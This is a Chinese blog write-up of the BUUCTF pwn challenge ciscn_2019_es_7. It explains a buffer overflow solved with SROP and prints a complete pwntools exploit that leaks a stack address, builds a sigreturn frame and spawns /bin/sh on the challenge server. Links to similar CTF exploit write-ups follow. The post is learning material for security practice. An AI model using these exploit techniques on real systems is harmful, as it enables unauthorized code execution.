ciscn_2019_es_7

最新推荐文章于 2024-09-27 09:55:25 发布
最新推荐文章于 2024-09-27 09:55:25 发布
阅读量1k 收藏
点赞数
分类专栏: buuctf 题目 文章标签: elasticsearch big data pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzq487782568/article/details/122203640
版权

ciscn_2019_es_7

查看保护
请添加图片描述
请添加图片描述
有溢出,还有系统调用syscall。srop。
请添加图片描述
输入0x10,write时可以out出0x30个,动态发现会有一个栈上地址。
请添加图片描述
栈上地址距离buf地址0x128(在本机动态时是0x128在远程是0x118,本地没有patchelf)有了buf地址也就是/bin/sh的地址。因为buf中输入/bin/sh就行了。接下来就是Sigreturnframe的布局和sigreturn的调用。

from pwn import *

context(arch='amd64', os='linux', log_level='debug')

file_name = './z1r0'

debug = 1
if debug:
    r = remote('node4.buuoj.cn', 25142)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

vuln = 0x04004ED

p1 = b'a' * 0x10 + p64(vuln)
r.sendline(p1)
stack_addr = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))
success('stack_addr = ' + hex(stack_addr))

#buf_addr = stack_addr - 0x128
buf_addr = stack_addr - 0x118
success('buf_addr = ' + hex(buf_addr))

syscall_ret = 0x400517
sigret = 0x4004DA

sigframe = SigreturnFrame()
sigframe.rax = constants.SYS_execve
sigframe.rdi = buf_addr
sigframe.rsi = 0x0
sigframe.rdx = 0x0
sigframe.rsp = stack_addr
sigframe.rip = syscall_ret

p1 = b'/bin/sh' + b'\x00' * (0x1 + 0x8)
p1 += p64(sigret) + p64(syscall_ret) + bytes(sigframe)

r.send(p1)

r.interactive()
z1r0.
关注
专栏目录
BUUCTF栈迁移ciscn_2019_es_2
Rt1Text的博客
04-09 1040
1.checksec+运行获取基本信息 32位+NX堆栈不可执行 2.常规IDA操作 1.main函数 并没有什么 2.int vul()函数 程序主体,信息很多 1.两次read都在往同一个地方s处读入数据 2.要读入0x30,但s大小只有0x28,如果有后门函数,直接常规栈溢出操作 但是shift+f12 这里仅仅是打印flag字符串,没有用 同时查看hack函数 system里面的参数不是bin_sh不能直接用,所以要修改system的参数 但是...
ciscn_2019_es_2
m0sway的博客
11-22 2305
ciscn_2019_es_2 使用checksec查看: 只开启了栈不可执行,放进IDA中查看: 主函数中直接给了vul() 函数,跟进去查看: 程序读取了两次数据,都是用变量s接收,但溢出所需的输入间不够 so…间不够,可以考虑使用栈迁移的方式: 两次s变量使用的都是同一间,可以使用第一次read去泄露出ebp的地址,接着利用第二次read在s变量处写入ROP,在ret时,进行栈迁移,迁移到s处。 from pwn import * #start r = remote("node4.bu
buuctf ciscn_2019_es_7
qq_42728977的博客
04-13 842
srop 之前听说过,但是没做过,今天算是见识了。 整体思路就是 就是在内核返回到用户时,会把原来的context(保存在栈里)给复原,栈里
[BUUCTF]ciscn_2019_es_7(SROP)
zyxx_wjc的博客
07-12 361
[BUUCTF]ciscn_2019_es_7
[BUUCTF]PWN——ciscn_2019_es_7[详解]
mcmuyanga的博客
01-12 1589
ciscn_2019_es_7 附件 步骤: 例行检查,64位程序,开启了nx保护 本地试运行一下看看大概的情况 64位ida载入,关键函数很简单,两个系统调用,buf存在溢出 看到系统调用和溢出,想到了SROP,之前遇到过一次,关于原理可以看一下这两篇文章 https://www.freebuf.com/articles/network/87447.html https://ctf-wiki.org/pwn/linux/stackoverflow/advanced-rop/srop/?h=+sr
ciscn_2019_es_7 6/100
m0_57754423的博客
03-02 285
漏洞点: 经典SROP write函数泄露栈的地址 栈上写入'/bin/sh'字符串,控制rdi为 sh 字符串地址,rax为sigreturn系统调用号 exp: from pwn import * context(arch='amd64', os='linux', log_level='debug') file_name = './es_7' debug = 1 if debug: r = remote('node4.buuoj.cn', 28915) else: r
pwnciscn_2019_es_2
Nothing
12-24 2800
例行检查 分析程序,程序存在system函数,但是不能直接得到flag。 vul函数中存在栈溢出,但只能溢出8个字节,只能盖到ebp和ret。vul函数中有两次read和printf第一次可以用来泄露ebp,得到栈地址,然后进行栈迁移。然后利用main函数返回时将控制流转到system。 根据一下汇编代码布置栈数据。 from pwn import * #io=process('ciscn...
cisn_2019_es_3——ROP栈迁移
weixin_44164182的博客
07-17 213
ROP栈迁移 通过leave和ret指令,将栈帧劫持到指定地址。一般用于存在溢出,但可溢出的字节数不足以写入完成ROP chain的情况。通过栈帧劫持,在可供写入的缓冲区内完成ROP chain构造,然后将栈帧劫持到指定地址,完成控制流劫持。 leave = mov esp,ebp pop ebp ret= pop eip 通过栈帧劫持,存在栈溢出的位置最少只需溢出两个dword(qword in x64)就可以完全控制程序执行流 如上程序,char s处存在两个dword的溢出,可以覆盖last_
BUUCTF-PWN刷题记录-5(Tcache)
weixin_44145820的博客
04-13 1477
目录ciscn_2019_final_3[V&N2020 公开赛]easyTHeap ciscn_2019_final_3 只有添加和删除两个功能 限制了申请的大小,最大为0x78,意味着chunk最大为0x80,添加完可以泄露堆上的地址 free之后没有置,可以double free 题目分析差不多就这样,下面是漏洞利用: 先申请一个大小为0x78的heap[0],记录下返回地...
[BUUCTF]-PWN:ciscn_2019_es_7解析(系统调用execve,srop)
2301_79326813的博客
01-30 364
这道题好像和buu的ciscn_2019_s_3是一模一样的看保护64位,没开canary和pie看ida题目还有能往rax传递0x3B和0xf的函数,这就提示我们可以用系统调用来getshell。
buuctf ciscn_2019_es_7的wp
wuyvle的博客
03-15 1237
打开一看,我觉得是srop,具体知识不先介绍了 这是一个最简单的攻击。在这个攻击中,有4个前提条件: 第一,攻击者可以通过stack overflow等漏洞控制栈上的内容; 第二,需要知道栈的地址(比如需要知道自己构造的字符串/bin/sh的地址); 第三,需要知道syscall指令在内存中的地址; 第四,需要知道sigreturn系统调用的内存地址。 我们先要泄露buf在栈上的地址,我们能在sys_read上写0x20个,而wirte可以打印0x30的, 可以泄露 from pwn import * .
picoctf_2018_buffer overflow 2&&wustctf2020_getshell&&[BJDCTF 2nd]snake_dyn&&ciscn_2019_es_7[rsop]
、moddemod
07-22 428
picoctf_2018_buffer overflow 2 exp from pwn import * context.log_level = 'debug' def debug_pause(): log.info(proc.pidof(p)) pause() proc_name = './PicoCTF_2018_buffer_overflow_2' p = process(proc_name) p = remote('node3.buuoj.cn', 28375) elf =
ciscn_2019_sw_7
seaaseesa的博客
05-01 547
ciscn_2019_sw_7 首先检查一下程序的保护机制 然后,我们用IDA分析一下,最多创建10个堆,并且size不能超过0x60 Delete功能没有清指针,因此可以double free。 由于size受限制,因此我们需要伪造一个unsorted bin范围的chunk,glibc版本2.27,存在tcache,因此,我们还要先攻击tcache bin表头,篡改对应的...
[BUUOJ] ciscn_2019_n_3
Joaus的博客
10-06 1834
这里写自定义目录标题漏洞点漏洞利用exp 漏洞点 可以看到主要就是在free的时候没有将相应的数组里的置0,可以导致UAF的漏洞: 漏洞利用 由于本题将printf和free函数的指针都放在了申请的堆上,而且程序调用了system函数因此我们就不用泄露libc基址了,我们的目标就是取得对存放指针的堆块的控制。 我们可以利用fastbin的LIFO的机制,取得对存放指针的堆块的控制,修改free指...
ciscn_2019_c_5
doudoudedi
02-09 550
思路 格式化字符串leak然后打free_hook exp: from pwn import * #p=process('./ciscn_2019_c_5') p=remote('node3.buuoj.cn',27000) elf=ELF('./ciscn_2019_c_5') libc=elf.libc def add(size,story): p.sendlineafter(':'...
ciscn2019部分writeup
Sea_Sand息禅
06-06 1312
Web 1、JustSoso 拿到源码 打开靶机,查看源码得到提示: 一看就是文件读取,然后就文件读取走一波。 file=php://filter/read=convert.base64-encode/resource=hint.php base64解码拿到hint.php的源码: <?php class Handle{ private $handle; ...
ciscn_2019_n_5
qq_39869547的博客
01-11 1030
very easy # -*- coding:utf-8 -*- from PwnContext.core import * local = 1 if local == 1 : p = remote('node3.buuoj.cn','25056') else: ctx.binary = binary ctx.remote_libc = debug_libc ctx...
pre-commit 的配置文件
最新发布
qq_45762996的博客
09-27 948
pre-commit 是一个用于管理和维护多种预提交钩子的框架,旨在在代码提交(git commit)之前自动执行一系列检查和格式化任务,以确保代码质量和一致性。
Windows7下ElasticSearch_0.90.0详细安装步骤
本文将详细阐述如何在Windows 7环境下安装ElasticSearch 0.90.0版本。在开始安装前,确保您的计算机已安装了Java Development Kit (JDK),因为ElasticSearch依赖JDK运行。 第一步:下载ElasticSearch 首先,访问...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

z1r0.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值